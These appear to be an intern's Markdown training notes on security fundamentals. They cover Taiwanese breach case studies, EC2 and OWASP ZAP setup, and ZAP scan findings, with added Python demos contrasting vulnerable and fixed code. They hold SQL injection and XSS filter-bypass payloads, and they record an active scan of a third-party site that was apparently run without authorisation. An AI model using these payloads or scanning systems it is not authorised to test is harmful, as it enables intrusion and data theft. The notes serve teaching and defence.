# Intern W1: Security Fundamentals and Attack/Defence Concepts

# 0. Background knowledge (from university courses)

## 1. [Compiled notes: Operating Systems practicum knowledge map](https://hackmd.io/@XianYu/ByBPihH66) 💻
## 2. [Compiled notes: Computer Networks knowledge map](https://hackmd.io/@XianYu/SyooMmOaT) 💻

# 0. Recommended and frequently used sites

## 1. [HITCON ZeroDay, Traditional-Chinese vulnerability reports](https://zeroday.hitcon.org/vulnerability) --> write-ups of real attacks
![image](https://hackmd.io/_uploads/ByaZ-5B6p.png)
## 2. [Exploit Database](https://www.exploit-db.com/) --> exploit scripts (run them only inside a VM you control)
![image](https://hackmd.io/_uploads/Hk28Z9r6T.png)
## 3. [IPinfo](https://ipinfo.io/) --> look up your current public IP
![image](https://hackmd.io/_uploads/SkNAZcrap.png)
## 4. [CVE List](https://cve.mitre.org/index.html) --> look up CVE entries by identifier or keyword. Note that the CVE list assigns identifiers and descriptions only; the severity score is CVSS, published with the entry by NVD and by vendors, not by the CVE list itself
![image](https://hackmd.io/_uploads/HkX2MqHpT.png)
## 5. [MITRE ATT&CK](https://attack.mitre.org/matrices/enterprise/) --> the matrix of attack tactics (phases) and the techniques used in each
![image](https://hackmd.io/_uploads/B1wbQ5Sap.png)
## 6. [OSCP Certification](https://www.offsec.com/courses/pen-200/)
> Reference: [[Day 6] Penetration-testing certification: a short note on OSCP](https://ithelp.ithome.com.tw/articles/10269099)
> Reference: [From rookie to OSCP](https://ewater.medium.com/%E5%BE%9E%E8%8F%9C%E9%9B%9E%E5%88%B0oscp-ce206e9137e7)

# Part 1. Security basics (link collection)

## 1. [Day 4: Concepts: what are the common types of security attacks?](https://ithelp.ithome.com.tw/articles/10293786?sc=pt)
## 2. [OWASP Top 10](https://www.owasptopten.org/): the ten most critical web application security risks (the 2021 edition is the current one as of these notes)

# Part 2. [Thirty security case studies with analysis](https://ithelp.ithome.com.tw/users/20107482/ironman/1968)

## 1. Compiled notes (readable) 💻 [internW1: summary of the thirty case studies and follow-up research, case extracts](https://hackmd.io/@XianYu/rJmy4nSa6)
## 2. Related sites
### [FireEye (US security company, now Trellix)](https://www.trellix.com/)

# Part 3. Case analyses

## 1. Judicial Yuan breach
* News source: [Hacked! Citizens' personal data and sensitive material reportedly exposed; the Judicial Yuan responds](https://www.ctwant.com/article/297204?utm_source=yahoo&utm_medium=rss&utm_campaign=297204)

(1) **Event**: the Judicial Yuan was compromised; large amounts of citizens' personal data, court judgments and data from various agencies were reportedly obtained by the attackers and posted on Telegram.
(2) **Attacked unit**: Judicial Yuan, Information Management Department
(3) **System**: the Judicial Yuan website database
(4) **Date**: 2023/04/03
(5) **Attack method**: SQL injection
(6) **Investigation**: the Judicial Yuan at first only replied that "security was not compromised" and denied the report's claims that intranet passwords and judgments had been published; the incident was reported under the Regulations on Notification and Response of Cyber Security Incidents. It later confirmed that the compromised host was the public case-query terminal host, which held no citizen accounts and stored no judgments.
(7) **Follow-up**: passwords were changed immediately, host firewall rules were configured, the host was blocked from connecting out and other hosts were blocked from connecting in, and a new host was rebuilt.
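The case above names SQL injection as the entry point, and the ZAP scan in W2 below tests for it with the probe `12' AND '1'='1' -- `. The following is an added example, not code from these notes or from any of the systems discussed: a case-lookup query built by string formatting next to the parameterised version, both exercised with that boolean probe. The table, dockets and column names are constructed for the demo, and SQLite stands in for the real DBMS.

```python
"""Added example: string-built SQL vs. a bound parameter, probed the way
ZAP does it. Everything here is constructed; SQLite stands in for the
real database."""
import sqlite3

# Constructed sample data: two public cases and one sealed record.
_CASES = [
    (12, "2023-A-12", "public"),
    (13, "2023-A-13", "public"),
    (99, "2023-S-99", "sealed"),   # must never be returned to the public
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cases (id INTEGER, docket TEXT, status TEXT)")
    conn.executemany("INSERT INTO cases VALUES (?, ?, ?)", _CASES)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, case_id: str) -> list:
    """The flaw: the user-supplied id is pasted into the SQL text, so the
    quote, the AND clause and the -- comment in a payload become SQL."""
    sql = f"SELECT docket FROM cases WHERE id = '{case_id}' AND status = 'public'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, case_id: str) -> list:
    """The fix: the same query with the value bound as a parameter. The
    driver sends it as data, so it can only ever match an id, never
    alter the statement (and the status filter can no longer be
    commented away)."""
    sql = "SELECT docket FROM cases WHERE id = ? AND status = 'public'"
    return [row[0] for row in conn.execute(sql, (case_id,))]


def boolean_probe(lookup, base: str = "12") -> bool:
    """ZAP's boolean-based check: send a TRUE and a FALSE condition in the
    same parameter. If the two responses differ, the input reached the
    SQL parser. Returns True when the endpoint looks injectable."""
    true_resp = lookup(f"{base}' AND '1'='1' -- ")
    false_resp = lookup(f"{base}' AND '1'='2' -- ")
    return true_resp != false_resp


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable probe:", boolean_probe(lambda v: lookup_vulnerable(conn, v)))
    print("safe probe:     ", boolean_probe(lambda v: lookup_safe(conn, v)))
    # A tautology plus a comment dumps every row, sealed records included.
    print("dump:", lookup_vulnerable(conn, "' OR 1=1 -- "))
```

The trailing space after `--` in the probes is part of the payload: some SQL dialects require whitespace after the comment marker, which is why ZAP and sqlmap always include it.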
### 1. [[Post x1] Attack behaviour: SQL injection](https://ithelp.ithome.com.tw/articles/10189201)
### 2. [Web security 🔒 Understand SQL injection in one read: "the Yongzheng succession mystery"](https://medium.com/@jaydenlin/%E6%B7%BA%E8%AB%87%E9%A7%AD%E5%AE%A2%E6%94%BB%E6%93%8A-%E7%B6%B2%E7%AB%99%E5%AE%89%E5%85%A8-%E4%B8%80%E6%AC%A1%E7%9C%8B%E6%87%82-sql-injection-%E7%9A%84%E6%94%BB%E6%93%8A%E5%8E%9F%E7%90%86-b1994fd2392a)

## 2. Household registration data breach
* News source: ["OKE" sells 23.57 million+ Taiwanese household registration records, suspected to have flowed to China; Chinese hacker wanted](https://news.ltn.com.tw/news/society/breakingnews/4455989)

(1) **Event**: a seller using the handle "OKE" offered more than 23.57 million Taiwanese household registration (戶役政) records for sale on the foreign hacking forum BreachForums, a leak of personal data.
(2) **Attacked unit**: Taiwan household registration offices (as reported)
(3) **System**: the household registration database
(4) **Timeline**: offence on 2022/10/21; search carried out at the end of June 2023
(5) **Attack method**: the suspect bought the citizens' data from an overseas hacker, paying in cryptocurrency, and resold it on BreachForums
(6) **Investigation**: prosecutors sent the suspect's computer to the Investigation Bureau's cyber-security station for digital forensics. They confirmed that in the eight months after buying the data he had not leaked it, and he received a deferred prosecution.
(7) **Follow-up**: BreachForums has since been seized and shut down by US authorities. How the data left Taiwan, and whether other buyers exist who have not surfaced, is still under investigation.

## 3. iRent database exposure
* News source: [iRent database exposed on the public internet without protection draws public attention; misconfiguration deserves more scrutiny](https://www.ithome.com.tw/news/155392)
* TechCrunch report: [Hotai Motor exposed thousands of iRent customer documents](https://techcrunch.com/2023/01/30/hotai-motor-exposed-irent-customer-data/)
* Extended case on unprotected databases: [iRent's exposure through misconfiguration is not a new issue; local companies must learn the lesson so it stops repeating](https://www.ithome.com.tw/news/155393)

(1) **Event**: the iRent database was exposed on the internet; up to 400,100 customers potentially affected
(2) **Attacked unit**: Hotai Cloud Services (和雲行動服務), operator of the iRent car-sharing service
(3) **System**: the iRent database
(4) **Timeline**: disclosed 2023/1/31; statements issued on 2/1 and 2/4
(5) **Attack method**: data exposure through an unprotected database, not an exploit
  * Access: the operator neither blocked external connections nor set a password, so anyone on the internet who knew the IP address could read the iRent customer database (database exposure)
  * Storage: it is unclear whether the data at rest was encrypted at all (column encryption, encrypted backups, transparent data encryption, Always Encrypted), and at what strength
  * Uploaded identity documents were only encoded (for example Base64), not encrypted. Encoding is reversible by anyone and provides no confidentiality
(6) **Investigation**: the company received the report on 1/28 and responded within an hour; the preliminary finding was that the exposed system was a temporary database holding application log records
(7) **Follow-up**: notifying the affected customers, remediation and corrective actions, host vulnerability scanning and penetration testing, app source-code scanning, and "SSL encryption and app packing for the transaction flow". None of these addresses the root cause of this incident, an unauthenticated database reachable from the internet.

## 4. LastPass password backups and encryption keys leaked
* News source: [LastPass parent GoTo confirms user password backups and encryption keys leaked](https://www.ithome.com.tw/news/155264)
* Investigation report: [LastPass finds attackers stole users' encrypted password vaults](https://www.ithome.com.tw/news/154862)

(1) **Event**: security incident at GoTo, LastPass's parent company
  * 1. User password backups and their encryption keys were stolen (the attackers broke into the development environment and copied customers' encrypted password vaults)
  * 2.
Source code and proprietary technical information were also stolen (the vault data itself is encrypted with 256-bit AES)
(2) **Attacked unit**: GoTo and its subsidiary LastPass
(3) **Systems**: several products, including the IT management tool Central, the remote access and management software Pro, the online meeting tool `join.me`, the network virtualisation/VPN service Hamachi, and the remote access and management software RemotelyAnywhere
(4) **Timeline**: unusual activity in the development environment and in a third-party cloud storage service detected in November 2022; disclosed to users on the company blog on 2022/11/30; investigation report completed in December 2022
(5) **Attack method**:
  * theft of encrypted backups, which the attacker can then try to brute-force offline, one master-password guess at a time, with no rate limit
  * the attacker reached the user password backups and encryption keys through the third-party cloud storage service
  * the data included account user names, hashed/processed passwords and multi-factor authentication settings
(6) **Investigation**: the company investigated with help from Mandiant and found that the attacker had gone through the third-party cloud services tied to the IT management, remote access and online meeting products. The attacker also obtained the key used for the encrypted backups. Users were warned and law enforcement was notified.
(7) **Follow-up**:
1. salting and hashing all account passwords
2. resetting affected users' passwords or MFA settings
3. migrating accounts to a more secure identity management platform
4. fully decommissioning the compromised environment and rebuilding the development environment
5. hardening developer machines, processes and authentication
6. adding extra logging and alerting to detect unauthorised activity
7. rotating all potentially affected credentials and certificates, and strengthening endpoint security
(8) **Similar case (cloud data theft)**: [Thirty case studies, DAY 17: suspect exploits people's password habits to break into Google Drive, steal personal data and empty bank accounts](https://ithelp.ithome.com.tw/articles/10205054)

## 5. Okta customer data leak
* News source: [Okta completes investigation of the October breach: 134 customers' data leaked](https://www.ithome.com.tw/news/159667)
* [Okta's support case management system breached; shares fall 11%](https://www.ithome.com.tw/news/159430)

(1) **Event**: Okta was breached; files belonging to 134 customers were exposed, and the sessions of 5 customers were hijacked.
(2) **Attacked unit**: Okta
(3) **Systems**: Okta's support case management system; Cloudflare was among the affected customers
(4) **Timeline**: investigation began 2023/09/29; the stolen service account was identified on 2023/10/13 and 10/16; Cloudflare's Okta tenant was accessed on 2023/10/18
(5) **Attack method**:
  * the attacker used stolen credentials to access Okta's support case management system
  * the stolen files were HAR (HTTP Archive) files that customers had uploaded for troubleshooting; a HAR records full requests and responses, so these contained live session tokens (cookies)
(6) **Investigation**:
  * logs related to the support cases were reviewed, and IP address clues supplied by partners led to further file-access events tied to the compromised account
  * the stolen service account had permission to view and update customer support files
  * the security team found that an employee had signed in to a personal Google account in Chrome on an Okta-managed laptop
  * the likely path: the service account credential was saved in the personal Google profile and leaked when that account or device was compromised
(7) **Follow-up**:
  * the compromised service account was disabled
  * signing in to personal Google accounts in Chrome on managed devices was blocked
  * additional monitoring rules were deployed on the customer support system
  * Okta administrator session tokens can now be bound to the network location they were issued from, so a token replayed from elsewhere is rejected
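The Okta breach turned on HAR files that carried live session cookies. The following is an added example, not from these notes or from Okta: a small sanitiser that reports and redacts session material in a HAR before it is attached to a support ticket. A HAR is plain JSON (HAR 1.2: `log.entries[]` with `request`/`response`, each holding `headers[]` and `cookies[]`). The header list and the sample capture are constructed for the demo; extend `SENSITIVE_HEADERS` for your own applications.

```python
"""Added example: find and redact session material in a HAR file.
The header list and the sample capture are constructed, not real."""
import copy
import json

# Header names that routinely carry bearer tokens or session cookies.
SENSITIVE_HEADERS = {"authorization", "cookie", "set-cookie", "x-api-key"}
REDACTED = "[REDACTED]"


def _iter_secret_fields(har: dict):
    """Yield (entry index, location, field dict) for every secret-bearing
    header or cookie, in both directions of every recorded exchange."""
    for i, entry in enumerate(har["log"]["entries"]):
        for side in ("request", "response"):
            part = entry.get(side, {})
            for h in part.get("headers", []):
                if h.get("name", "").lower() in SENSITIVE_HEADERS:
                    yield i, f"{side}.headers", h
            for c in part.get("cookies", []):        # every cookie is a secret
                yield i, f"{side}.cookies", c


def find_secrets(har: dict) -> list:
    """Report what would leak: (entry index, location, field name)."""
    return [(i, where, f["name"]) for i, where, f in _iter_secret_fields(har)]


def redact(har: dict) -> dict:
    """Return a deep copy with every secret value replaced; the input is
    left untouched so the caller can diff before and after."""
    clean = copy.deepcopy(har)
    for _, _, field in _iter_secret_fields(clean):
        field["value"] = REDACTED
    return clean


def redact_file(src: str, dst: str) -> int:
    """Sanitise src into dst; returns the number of fields redacted."""
    with open(src, encoding="utf-8") as f:
        har = json.load(f)
    hits = find_secrets(har)
    with open(dst, "w", encoding="utf-8") as f:
        json.dump(redact(har), f, indent=1)
    return len(hits)


# Constructed sample capture: one admin API call carrying a live session.
SAMPLE_HAR = {
    "log": {"version": "1.2", "entries": [{
        "request": {
            "method": "GET", "url": "https://example.okta.com/api/v1/users",
            "headers": [{"name": "Cookie", "value": "sid=abc123; DT=xyz"},
                        {"name": "Accept", "value": "application/json"}],
            "cookies": [{"name": "sid", "value": "abc123"}],
        },
        "response": {
            "status": 200,
            "headers": [{"name": "Set-Cookie", "value": "sid=def456; Secure"}],
            "cookies": [{"name": "sid", "value": "def456"}],
        },
    }]}
}

if __name__ == "__main__":
    for hit in find_secrets(SAMPLE_HAR):
        print("would leak:", hit)
    print(json.dumps(redact(SAMPLE_HAR), indent=1))
```

Redaction is the second line of defence; the first is that a session token in a HAR is still valid until it expires or is revoked, so after sharing a raw HAR the only safe response is to sign out everywhere and invalidate the sessions, which is what Okta's customers had to do.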
## 6. Delta Electronics ransomware attack
* News source: [Security daily, 2022/01/28: Delta Electronics suspected hit by the Conti ransomware; attackers collect lists of VMware remote-work platforms vulnerable to Log4Shell](https://www.ithome.com.tw/news/149136)
* [Taiwanese Apple and Tesla contractor hit by Conti ransomware](https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/)
* [Delta Electronics hacked, NT$410 million ransom demanded; an estimated 13,500 machines encrypted](https://www.ctwant.com/article/165246)
* [Initial Access Brokers (IAB): What You Need to Know](https://securityboulevard.com/2023/11/initial-access-brokers-iab-what-you-need-to-know/)
* [Log4U, Shell4Me](https://blogs.blackberry.com/en/2022/01/log4u-shell4me) (reference material)

(1) **Event**: Delta Electronics was reportedly hit by the Conti ransomware. Reports say that of its 65,000 machines, some 1,500 servers and 12,000 PCs were encrypted, with a ransom demand of USD 15 million (about NT$412 million).
(2) **Attacked unit**: Delta Electronics
(3) **Systems**: the company website and business systems
(4) **Date**: infected on 2022/01/21
(5) **Attack method**: ransomware
  * Conti ransomware; servers and PCs on the internal network were encrypted
  * Visibility: the details were surfaced by AdvIntel's "Andariel" platform, which provides adversary visibility
  * The attack followed a recognisable pattern:
  * Cobalt Strike: a popular post-exploitation framework, used to gain access to the victim network and keep control of it
  * Atera / AnyDesk: a legitimate remote-management agent installed for persistence, a fixed part of the Conti playbook
![image](https://hackmd.io/_uploads/rJSiarO66.png)
> Delta Electronics Conti ransom note (BleepingComputer)
(6) **Investigation**:
  * 2022/01/18: the AdvIntel "Andariel" platform detected the attack
  * 2022/01/28 17:00: the company website was still down
(7) **Follow-up**: Delta stated it had engaged Trend Micro and Microsoft's security teams to investigate
(8) **Similar case**: [Apple supplier Quanta hit with $50 million ransomware attack from REvil](https://www.bing.com/search?q=REvil+Quanta&cvid=c2221a3fdcf94d5e892e3dc8a1a50631&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIHCAEQRRj8VdIBCDE2NTFqMGo0qAIAsAIA&FORM=ANAB01&PC=U531)

---

# W2: Vulnerability scanning

# Part 1. Task: create an EC2 VM with a GUI and install ZAP

Connection error
![image](https://hackmd.io/_uploads/HJqm-LKAa.png)

```
C:\Users\iris.yu>ssh -i "C:\Users\iris.yu\Downloads\cyber-key.pem" cyber@52.43.108.217
The authenticity of host '52.43.108.217 (52.43.108.217)' can't be established.
ECDSA key fingerprint is SHA256:xlvBpMD5XJZU9It4KOvg3i9/79Ld/8qPVkqQ/KhiijI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '52.43.108.217' (ECDSA) to the list of known hosts.
cyber@52.43.108.217: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
```

* This is not an EC2-specific problem, and the output contains two unrelated messages. "The authenticity of host can't be established" is the normal first-connection host-key check, not an error; answer yes after comparing the fingerprint with the one printed in the EC2 console's system log. The actual failure is `Permission denied (publickey)`: the server rejected the key for the user `cyber`. The login user is fixed by the AMI (`ec2-user` on Amazon Linux, `ubuntu` on Ubuntu), and a user called `cyber` does not exist on a fresh instance. The `gssapi-*` methods in the list are characteristic of Amazon Linux's sshd, so `ec2-user` is the right name here.
### Reference
> 1. [The authenticity of host can't be established](https://stackoverflow.com/questions/11443687/the-authenticity-of-host-cant-be-established)
> 2.
[Authenticity of host can't be established in AWS ssh](https://stackoverflow.com/questions/11443687/the-authenticity-of-host-cant-be-established)
> 3. [Git says "Warning: Permanently added to the list of known hosts"](https://stackoverflow.com/questions/9299651/git-says-warning-permanently-added-to-the-list-of-known-hosts)
### Solution
* Note: **do not change the default user name `ec2-user`**; log in as the AMI's default user with the key pair attached at launch.
![image](https://hackmd.io/_uploads/HJQ_WLt0a.png)
### Desktop GUI tools
> 1. [How To Set Up GUI On Amazon EC2 Ubuntu server](https://stackoverflow.com/questions/25657596/how-to-set-up-gui-on-amazon-ec2-ubuntu-server)
> 2. [Configure the Amazon Linux 2 MATE desktop connection](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/amazon-linux-ami-mate.html)
## Problem: Linux "Command not found"
![image](https://hackmd.io/_uploads/rkC7FGYRT.png)
### Use an older image: do not pick Amazon Linux 2023
> [Install a GUI on an Amazon Linux 2 EC2 instance](https://repost.aws/knowledge-center/ec2-linux-2-install-gui) (the MATE desktop package in this guide exists for Amazon Linux 2 only, which is why the commands are "not found" on the 2023 image)
![image](https://hackmd.io/_uploads/HkZa7XhT6.png)
![image](https://hackmd.io/_uploads/r1Q1VQhp6.png)
![image](https://hackmd.io/_uploads/rJA1Nm3pa.png)
* Note: you can open a bash shell directly from the EC2 instance page with Connect
![image](https://hackmd.io/_uploads/r106YGKAp.png)
## Ubuntu approach: follow the site step by step
* This series is good!
> [【Cloud】Connecting to an AWS Ubuntu VM over Remote Desktop](https://learningsky.io/remote-desktop-connect-aws-ubuntu-vm/)
* Remember to open the remote-desktop port 3389 in the security group, or the connection will not work. Restrict the source to your own IP rather than 0.0.0.0/0; RDP exposed to the whole internet is brute-forced within hours.
* For the step `sudo netstat -plnt | grep rdp` (checking that xrdp is listening), run `sudo apt update` and `sudo apt install net-tools` first, because `netstat` is not installed by default.
* The Ubuntu desktop opened successfully
![image](https://hackmd.io/_uploads/H10U7E3p6.png)
### Network issues
Network test: `ping www.google.com`
![image](https://hackmd.io/_uploads/rko75MY06.png)
`ip a`
![image](https://hackmd.io/_uploads/SynrqMKA6.png)
### The network works, but the browser would not open at first
* Give the desktop user sudo rights: `sudo su`, then `visudo`, and add the line
  `iris ALL=(ALL:ALL) ALL`
  (the fields can be separated by spaces or tabs; visudo only needs whitespace)
* vi usage: [Using vi](https://dywang.csie.cyut.edu.tw/dywang/linuxProgram/node4.html)
Editing the file in vi
![image](https://hackmd.io/_uploads/S1BkyShTp.png)
1.
Download the Google Chrome package: `wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb`
2. Install the .deb (dpkg installs it rather than "unzipping" it): `sudo dpkg -i google-chrome-stable_current_amd64.deb`
3. Fix missing dependencies if dpkg complains: `sudo apt-get install -f`
4. Run: `google-chrome`
   Chrome refuses to start as root unless it is given `--no-sandbox`, so run it as the normal desktop user rather than from the `sudo su` shell.
* Google opened!
> [GPT Ubuntu Google](https://chat.openai.com/share/cd4e650d-646f-4a2b-9920-f94885b75e64)
![image](https://hackmd.io/_uploads/H11hGS2pa.png)
### Download [OWASP ZAP](https://www.zaproxy.org/)
Related: [Day 22: scanning with OWASP ZAP](https://ithelp.ithome.com.tw/articles/10249892?sc=hot)
### RAM ran out
* Probably because Chrome was running while ZAP was being downloaded and started, the instance ran out of memory and crashed, and Connect could no longer reach it (ZAP is a Java desktop application; a desktop plus a browser plus ZAP does not fit in a small instance)
![image](https://hackmd.io/_uploads/B1a6IHhTa.png)
![image](https://hackmd.io/_uploads/H1h7_S26T.png)

# Part 2. Download and use ZAP

### Relaunch on an xlarge instance and repeat the steps above
* Install Java (ZAP 2.14 requires Java 11 or newer)
1. Install:
   `sudo apt-get update`
   `sudo apt-get install openjdk-11-jdk`
2. Set the environment:
   * `update-alternatives --config java`
   * `export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64` (the default path on Ubuntu amd64) and `export PATH=$PATH:$JAVA_HOME/bin`
* Download ZAP
![image](https://hackmd.io/_uploads/SJiyBL266.png)
1. Get the Linux package from [ZAP Downloads](https://www.zaproxy.org/download/)
2. Extract it: `tar -zxvf ZAP_2.14.0_Linux.tar.gz` (replace the file name with the one in Downloads)
* Run ZAP
1. `cd ZAP_2.14.0`
2.
`./zap.sh`
* ZAP started successfully
![image](https://hackmd.io/_uploads/rkc9EL3aT.png)

# Part 3. Vulnerability scanning with ZAP

## 1. References
> See: [Day 22: scanning with OWASP ZAP](https://ithelp.ithome.com.tw/articles/10249892?sc=hot)
> See: [OWASP ZAP scanner: installation and basic use](https://ithelp.ithome.com.tw/articles/10313098)
> See: [Web penetration testing with OWASP ZAP](https://medium.com/@jieshiun/%E7%B6%B2%E9%A0%81%E6%BB%B2%E9%80%8F%E6%B8%AC%E8%A9%A6-owasp-zap-60f03b8d340d)
> See: [Security testing: OWASP ZAP 2.8 guide (1): basics, download and installation](https://www.twblogs.net/a/5d846be4bd9eee541c34a162)
> See: [Web security testing: getting started with OWASP ZAP](https://www.tpisoftware.com/tpu/articleDetails/2161)
## 2. Finding a target on HITCON ZeroDay
* Go to [HITCON ZeroDay](https://zeroday.hitcon.org/vulnerability/disclosed/page/2) --> disclosed reports, and look for a site with a reported vulnerability
* Tested: [Prince tennis training camp website has a SQL injection vulnerability](https://zeroday.hitcon.org/vulnerability/ZD-2023-01051)
* Caution: a published ZeroDay report does not grant permission to test the site. An active scan sends real attack payloads; run against a third party without written authorisation it can be a criminal offence and can damage the target. Use it only against systems you own or are authorised to test, such as the DVWA lab set up in W3.
## 3. Running a scan
* Open Automated Scan, enter the URL --> Attack
![image](https://hackmd.io/_uploads/BJQybqATT.png)
* After pressing Attack, open Active Scan --> the dashboard icon shows the progress chart (scan progress details)
![image](https://hackmd.io/_uploads/Hk9H1jAa6.png)
* Top: the concrete requests that were sent
* Bottom: a summary by attack (vulnerability) type
![image](https://hackmd.io/_uploads/BkH5XtR6a.png)
* Generate Report produces a report
* Template can be switched to PDF
![image](https://hackmd.io/_uploads/HyUUcY0TT.png)
![image](https://hackmd.io/_uploads/S1wt9FC6T.png)

# Part 4. Vulnerability analysis

* Active Scan summary
![image](https://hackmd.io/_uploads/BJrDMjCap.png)
![image](https://hackmd.io/_uploads/H1S-msRap.png)
* Alerts summary
![image](https://hackmd.io/_uploads/r1nH7iR6a.png)
## 1. XSS (Cross-Site Scripting)
### 1. Alert
![image](https://hackmd.io/_uploads/r1oWN9AaT.png)
### 2. Attack test
* Following the alert, enter `'"<scrIpt>alert(1);</scRipt>` in the search box. The mixed case is deliberate: browsers treat tag names case-insensitively, so the payload gets past filters that only match a lowercase `<script>`.
![image](https://hackmd.io/_uploads/rkromcRa6.png)
* Error shown
![image](https://hackmd.io/_uploads/H1bAXqCTT.png)
![image](https://hackmd.io/_uploads/SkoRm506a.png)
### 3. References
1. [CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)](https://cwe.mitre.org/data/definitions/79.html)
2. [Cross Site Scripting](http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting)
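The following is an added example, not code from these notes or from ZAP: three versions of the search page's output handling, run against the exact payload ZAP sent above and a nested variant, with a rough "does a live script tag survive" oracle standing in for the browser. It shows why a tag blacklist fails (case, then nesting) and why context-aware output encoding is the fix. The page markup is constructed; there is no web server involved.

```python
"""Added example: why ZAP's mixed-case payload beats tag blacklists, and
why output encoding does not care. Constructed markup, no server."""
import html
import re

ZAP_PAYLOAD = "'\"<scrIpt>alert(1);</scRipt>"
# Nested variant: stripping the inner tag once reassembles a whole tag.
NESTED_PAYLOAD = "<scr<script>ipt>alert(1)</scr</script>ipt>"

_LIVE_SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def render_naive(q: str) -> str:
    """Blacklist exactly '<script>' and '</script>', case-sensitive.
    A change of case (scrIpt) walks straight through."""
    cleaned = q.replace("<script>", "").replace("</script>", "")
    return f"<p>Results for: {cleaned}</p>"


def render_regex_strip(q: str) -> str:
    """Case-insensitive removal in a single pass. Still bypassable: the
    nested payload only becomes a valid tag *after* the filter runs."""
    cleaned = re.sub(r"</?script>", "", q, flags=re.IGNORECASE)
    return f"<p>Results for: {cleaned}</p>"


def render_safe(q: str) -> str:
    """Encode for the HTML text context instead of guessing what is bad.
    quote=True also escapes ' and ", which covers the attribute context."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def executes_script(page: str) -> bool:
    """Rough stand-in for the browser's parser: is a live <script> tag
    (any case, opening or closing) present in the response?"""
    return bool(_LIVE_SCRIPT_TAG.search(page))


if __name__ == "__main__":
    for name, render in (("naive", render_naive),
                         ("regex-strip", render_regex_strip),
                         ("escape", render_safe)):
        for payload in (ZAP_PAYLOAD, NESTED_PAYLOAD):
            verdict = "FIRES" if executes_script(render(payload)) else "safe"
            print(f"{name:12s} {verdict:5s} {render(payload)}")
```

`html.escape` is only right for the HTML body and quoted attributes; a value reflected into a `<script>` block, a URL or a CSS property needs the encoder for that context (the OWASP XSS Prevention Cheat Sheet lists them), which is the reason templating engines encode per context rather than filtering input.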
## 2. Vulnerability analysis: SQL injection
### 1. Alert
![image](https://hackmd.io/_uploads/rJ0x3tAT6.png)
### 2. Test
* Following the alert, enter `12' AND '1'='1' -- ` in the search box. The trailing space after `--` is part of the payload. ZAP pairs this with `12' AND '1'='2' -- ` and reports the parameter when the two responses differ, a boolean-based check.
![image](https://hackmd.io/_uploads/BkdZRtCpa.png)
* Error shown
![image](https://hackmd.io/_uploads/r11SAFApT.png)
### 3. References
* Shown in the alert:
1. [SQL Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)
## 3. PDF report
![image](https://hackmd.io/_uploads/r18A_nCa6.png)
## 4. Vulnerability analysis
![image](https://hackmd.io/_uploads/r1Hfq6AT6.png)

# Part 5. Other settings

## 1. Switching Region
* One xlarge instance in us-west-2
![image](https://hackmd.io/_uploads/BJkkI5R6T.png)
* Another xlarge instance in Tokyo
![image](https://hackmd.io/_uploads/ryWQU90p6.png)
## 2. SoftEther VPN
[How to Set Up SoftEther VPN Server on Ubuntu 22.04/20.04](https://www.linuxbabe.com/ubuntu/set-up-softether-vpn-server)
* Installing build 9798
![image](https://hackmd.io/_uploads/S1vUPR06T.png)
![image](https://hackmd.io/_uploads/Hk-vvCATT.png)
### Error after `make`
![image](https://hackmd.io/_uploads/HJcxdCR6a.png)

```
cd vpnserver/
bash: cd: vpnserver/: No such file or directory
```

The `vpnserver` directory only exists if the source archive was extracted and the build finished, so check the output of `tar` and `make` first.
### Download the GitHub release (Bridge)
> See: [SoftEtherVPN / SoftEtherVPN_Stable](https://github.com/SoftEtherVPN/SoftEtherVPN_Stable/releases/)
![image](https://hackmd.io/_uploads/Hyi1lkJRp.png)

---

# Penetration testing

### Note 💡: for an Ubuntu VM, the SSH command from the local machine must use `ubuntu@<public ip>`, not `ec2-user`
![image](https://hackmd.io/_uploads/H1UPsVbAa.png)
* AWS --> instance --> Connect --> SSH client also shows the exact command with the right user name
![image](https://hackmd.io/_uploads/Sys2ofKAa.png)

# 0. Installing Docker
> See: [DAY 20: connect to the EC2 instance and install Docker](https://ithelp.ithome.com.tw/articles/10334594)
* `sudo apt update`
![image](https://hackmd.io/_uploads/rJY1hMt0a.png)
* `sudo apt install apt-transport-https ca-certificates curl software-properties-common`
![image](https://hackmd.io/_uploads/S1Hf2MtA6.png)
* `curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -`
  (`apt-key` is deprecated on Ubuntu 22.04; it still works here but prints a warning. Docker's current instructions store the key under `/etc/apt/keyrings/` and reference it with `signed-by=` in the repository line, which scopes the key to Docker's repository only)
![image](https://hackmd.io/_uploads/rkB7Ay410.png)
* `sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"`
![image](https://hackmd.io/_uploads/SJZdyeNk0.png)
* `sudo apt update`
![image](https://hackmd.io/_uploads/rkRqkg4yC.png)
* `apt-cache policy docker-ce`
![image](https://hackmd.io/_uploads/SJFJxgEkA.png)
* `sudo apt install docker-ce`
![image](https://hackmd.io/_uploads/rkK0yHZ06.png)
![image](https://hackmd.io/_uploads/ryJZeH-Aa.png)
* `sudo docker --version`
![image](https://hackmd.io/_uploads/By5GeBbCa.png)
* Add the account to the docker group: `whoami`, then `sudo usermod -a -G docker ubuntu` (log out and back in for it to take effect; membership of the docker group is equivalent to root on the host, so grant it only to users you would also give sudo)
![image](https://hackmd.io/_uploads/S1WcxH-Rp.png)
* Check that Docker runs: `sudo service docker start`, `sudo docker ps`
![image](https://hackmd.io/_uploads/Byw5ZrWR6.png)

# W3: Penetration testing

# Part 1. DVWA
* [Github digininja/DVWA](https://github.com/digininja/DVWA)
## 1. Install Docker on EC2
